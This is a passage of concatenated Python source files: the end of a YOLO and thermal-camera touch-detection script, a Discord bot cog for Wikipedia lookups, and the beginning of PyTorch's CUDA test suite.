yoloCommand = "%sdarknet detect %scfg/yolo.cfg %syolo.weights %s" % (darknetFolder, darknetFolder, darknetFolder, shifted_RGB_filename)
call(yoloCommand, shell=True)
#read in the object detection results file, which describes every object in 6 lines
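#(assumed layout, inferred from the parsing below: for each detected object the file holds its
#label, confidence, normalized centre x, normalized centre y, normalized width and normalized
#height, one value per line)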
f = open(objectDetectionResults_filename, 'r')
l = list(f)
f.close()
totalLines = len(l)
numberOfObjects = totalLines/6
objectNames = []
boxCentroids = []
boxSizes = []
print "Detected", numberOfObjects, "objects"
for currentObjectIndex in range(numberOfObjects):
objectLabel = l[currentObjectIndex*6].rstrip()
guessProb = l[currentObjectIndex*6+1].rstrip()
centerX = float(l[currentObjectIndex*6+2])
centerY = float(l[currentObjectIndex*6+3])
sizeX = float(l[currentObjectIndex*6+4])
sizeY = float(l[currentObjectIndex*6+5])
objectNames.append(objectLabel)
boxCentroids.append([centerX, centerY])
boxSizes.append([sizeX, sizeY])
#--------------------------------------------------------
# Detect touches in the object regions
#--------------------------------------------------------
#examine the thermal image inside each detected bounding box (thresholding to mask out background)
gray_therm = cv2.cvtColor(shifted_thermal, cv2.COLOR_BGR2GRAY)
for currentObjectIndex in range(len(boxCentroids)):
currentObj = objectNames[currentObjectIndex]
if currentObj != "person" and currentObj != "diningtable" and currentObj != "chair" and currentObj != "sofa":
centerX = boxCentroids[currentObjectIndex][0]
centerY = boxCentroids[currentObjectIndex][1]
sizeX = boxSizes[currentObjectIndex][0]
sizeY = boxSizes[currentObjectIndex][1]
p1_x = int((centerX-(sizeX/2))*width)
p1_y = int((centerY-(sizeY/2))*height)
p2_x = int((centerX+(sizeX/2))*width)
p2_y = int((centerY+(sizeY/2))*height)
boundingBoxRegion = gray_therm[p1_y:p2_y, p1_x:p2_x]
reducedBoundingBoxRegion = boundingBoxRegion.copy()
cv2.rectangle(reducedBoundingBoxRegion, (0, 0), ((p2_x-p1_x), (p2_y- p1_y)), 0, thickness=10)
cv2.rectangle(reducedBoundingBoxRegion, (0, 0), ((p2_x-p1_x), int(float(p2_y-p1_y) * PADDING_PARAMETER)), 0, thickness=-1)
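#(the two rectangles above blank out a 10-pixel border and the top PADDING_PARAMETER fraction of
#the box, so only the lower interior of each detection is searched for warm touch regions)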
ret1, thresholdedImage1 = cv2.threshold(reducedBoundingBoxRegion, 2, 255, cv2.THRESH_BINARY)
(means, stds) = cv2.meanStdDev(reducedBoundingBoxRegion, mask = thresholdedImage1)
print currentObj, " Mean: ", means[0][0], " SD: ", stds[0][0]
if stds[0][0] > SD_THRESHOLD:
print " SD high. Possibly a touch."
ret2, thresholdedImage2 = cv2.threshold(reducedBoundingBoxRegion, (means[0][0] + INTENSITY_THRESHOLD), 255, cv2.THRESH_BINARY)
#(_, cnts, _) = cv2.findContours(thresholdedImage2.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #use this line for OPENCV 3...
(cnts, _) = cv2.findContours(thresholdedImage2.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #use this line for OPENCV 2.4
if len(cnts) > 0:
for cnt in cnts:
theArea = cv2.contourArea(cnt)
print " Area: ", theArea
if theArea > AREA_THRESHOLD:
# approximate the contour
peri = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, APPROXIMATION_THRESHOLD * peri, True)
surfaceToArea = peri/theArea
print " Surface to area ratio: ", surfaceToArea
if surfaceToArea < SURFACE_AREA_THRESHOLD:
print " Touch predicted."
#draw the touch contour
boundingBoxRegion_rgb2 = shifted_rgb[p1_y:p2_y, p1_x:p2_x]
cv2.drawContours(boundingBoxRegion_rgb2, [cnt], -1, 255, -1)
shifted_rgb[p1_y:p2_y, p1_x:p2_x] = boundingBoxRegion_rgb2
#find the centroid of the touch and draw
mom = cv2.moments(cnt)
centroid_x = int(mom['m10']/mom['m00'])
centroid_y = int(mom['m01']/mom['m00'])
centroid_x = centroid_x + p1_x
centroid_y = centroid_y + p1_y
cv2.circle(shifted_rgb, (centroid_x, centroid_y), 3, (0, 0, 255))
#find closest box centroid
minDistance = 9999.9
closestObjectId = -1
for anObjectIndex in range(len(groundTruthLocations)):
anObject = groundTruthObjects[anObjectIndex]
if anObject == "person" or anObject == "diningtable" or anObject == "chair" or anObject == "sofa":
continue
c_x = groundTruthLocations[anObjectIndex][0]
c_y = groundTruthLocations[anObjectIndex][1]
cv2.circle(shifted_rgb, (c_x, c_y), 3, (0, 255, 0))
currentDistance = math.sqrt((centroid_x - c_x)*(centroid_x - c_x) + (centroid_y - c_y)*(centroid_y - c_y))
if currentDistance < minDistance:
minDistance = currentDistance
closestObjectId = anObjectIndex
print " Closest Object Id: ", closestObjectId
print " Object Name: ", groundTruthObjects[closestObjectId]
cv2.putText(shifted_rgb, groundTruthObjects[closestObjectId], (10, 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 0))
touchedItems.append(closestObjectId)
else:
print " Shape not round. Probably not a touch."
else:
print " Small area. Probably not a touch."
resultsLogFile = open(outputLogFileName, 'a')
#--------------------------------------------------------
# Output results
#--------------------------------------------------------
if len(touchedItems) == 1:
print "one touch detected"
lineToWrite = "%s %d %d \n" % (beforeBaseName, correctAnswer, touchedItems[0]+1)
resultsLogFile.write(lineToWrite)
else: #if no touches or multiple touches detected, output -1 and show the array
print "No touches or multiple touches detected"
lineToWrite = "%s %d -1 %s \n" % (beforeBaseName, correctAnswer, touchedItems)
resultsLogFile.write(lineToWrite)
resultsLogFile.close()
cv2.imwrite(outputImageFilename, shifted_rgb)
print ""
|
py | 7df9f54ed191972d06e0566065968a2915efbecf | import discord, wikipedia
from discord.ext import commands
from discord.ext.commands import cooldown, BucketType, CommandOnCooldown, guild_only
from wikipedia.wikipedia import search
class Wikipedia(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command(aliases=("Wikipedia_menu", "Wiki_menu", "wiki_menu"))
@guild_only()
async def wikipedia_menu(self, ctx):
if ctx.message.author.is_on_mobile():
embed = discord.Embed(title="Wikipedia menu (but for mobile)", description="if you want to search up an article, you can now!", color = discord.Colour.dark_red())
embed.set_footer(text=f"Command by {ctx.message.author.name}", icon_url=ctx.message.author.avatar_url)
embed.add_field(name="1️⃣wiki_summary", value="**It is a quick (or long) summary on the article you type in**")
embed.add_field(name="2️⃣wiki_search", value="**I recommend using this command first so that way you can understand what to type in correctly**")
embed.add_field(name="3️⃣wiki_page", value="**this is a risky command mostly because it will more than likely exceed 6000 characters, but if you know it won't; you can use it :D**")
await ctx.send(embed=embed)
return
embed = discord.Embed(title="Wikipedia menu", description="if you want to search up an article, you can now!", color = discord.Colour.dark_red())
embed.set_footer(text=f"Command by {ctx.message.author.name}", icon_url=ctx.message.author.avatar_url)
embed.add_field(name="wiki_summary", value="It is a quick (or long) summary on the article you type in")
embed.add_field(name="wiki_search", value="I recommend using this command first so that way you can understand what to type in correctly")
embed.add_field(name="wiki_page", value="this is a risky command mostly because it will more than likely exceed 6000 characters, but if you know it won't; you can use it :D")
await ctx.send(embed=embed)
return
@commands.command(aliases=("Wiki_search", "Wikipedia_search", "wikipedia_search"))
@guild_only()
async def wiki_search(self, ctx, *, search=""):
if search == "" or search == " ":
await ctx.send("you didn't put anything to search for")
return
if ctx.message.channel.id == 693942287910305842:
final = ""
lst = wikipedia.search(search)
for i in lst:
final += i + "\n"
await ctx.send("a list of articles:" + "\n" + "```" + "\n" + final + "```")
else:
await ctx.send(f"this command is only allowed in <#693942287910305842>")
return
@cooldown(1, 10, BucketType.user)
@commands.command()
@guild_only()
async def wiki_summary(self, ctx, * , search=""):
if search == "" or search == " ":
await ctx.send("it seems you didn't put anything in your search")
return
if ctx.message.channel.id == 693942287910305842:
try:
summary = wikipedia.summary(search)
page = wikipedia.page(search)
await ctx.send("```\n" + summary + "```")
except wikipedia.exceptions.DisambiguationError:
await ctx.send("wasn't able to find what you were looking for, try using `wiki_search` to list a few, and copy/paste it into here")
except wikipedia.exceptions.PageError:
await ctx.send("couldn't find the page you were looking for :pensive:")
except wikipedia.exceptions.RedirectError:
await ctx.send("RedirectError bro, try again..?")
except wikipedia.exceptions.WikipediaException:
await ctx.send("I got a weird exception that isn't recognizable by the code, ping wiki about his problem pls")
await ctx.send("unless you were missing an argument, then don't ping him")
else:
await ctx.send(page.url)
else:
await ctx.send("you must go to <#693942287910305842> to use this command")
return
@wiki_summary.error
async def wiki_summary_error(self, ctx, error):
if isinstance(error, CommandOnCooldown):
await ctx.send(f"{ctx.message.author.mention} sorry but you're on cooldown for {error.retry_after:.2f} seconds")
return
@cooldown(1, 10, BucketType.user)
@commands.command()
@guild_only()
async def wiki_page(self, ctx, *, search=""):
if search == "" or search == " ":
await ctx.send("it seems you didn't put anything in your search")
return
if ctx.message.channel.id == 693942287910305842:
try:
page = wikipedia.page(search)
await ctx.send("```\n" + page.content + "\n```")
except wikipedia.exceptions.DisambiguationError:
await ctx.send("wasn't able to find what you were looking for, try using `wiki_search` to list a few, and copy/paste it into here")
except wikipedia.exceptions.PageError:
await ctx.send("couldn't find the page you were looking for :pensive:")
except wikipedia.exceptions.RedirectError:
await ctx.send("RedirectError bro, try again..?")
except wikipedia.exceptions.WikipediaException:
await ctx.send("I got a weird exception that isn't recognizable by the code, ping wiki about his problem pls")
else:
await ctx.send(page.url)
else:
await ctx.send("sorry but you can only use this command in <#693942287910305842> ")
return
@wiki_page.error
async def wiki_page_error(self, ctx, error):
if isinstance(error, CommandOnCooldown):
await ctx.send(f"sorry but you're on cooldown {ctx.message.author.mention} for {error.retry_after:.2f} seconds")
return
def setup(client):
client.add_cog(Wikipedia(client))
|
py | 7df9f637274cb3b5f801445a7a5915ed3e9209b7 | # Owner(s): ["module: cuda"]
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY, \
get_cycles_per_ms
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_r >= last_r_arr[0]
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with an end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will get OOM when trying to allocate more than half the memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
# Test the case where the pinned data_ptr is not equal to the storage data_ptr.
x_base = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
x = x_base[1:]
self.assertTrue(x.is_pinned())
self.assertTrue(x_base.is_pinned())
self.assertNotEqual(x_base.data_ptr(), x.data_ptr())
self.assertEqual(x_base.storage().data_ptr(), x.storage().data_ptr())
y = torch.ones(10000000 - 1, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes a 0.1 second spin to the stream so that, if the copy is non-blocking,
# the stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage))
self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage))
q_copy[1].fill_(10)
self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cublas_allow_fp16_reduced_precision_reduction_get_set(self):
orig = torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = not orig
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), not orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fails")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
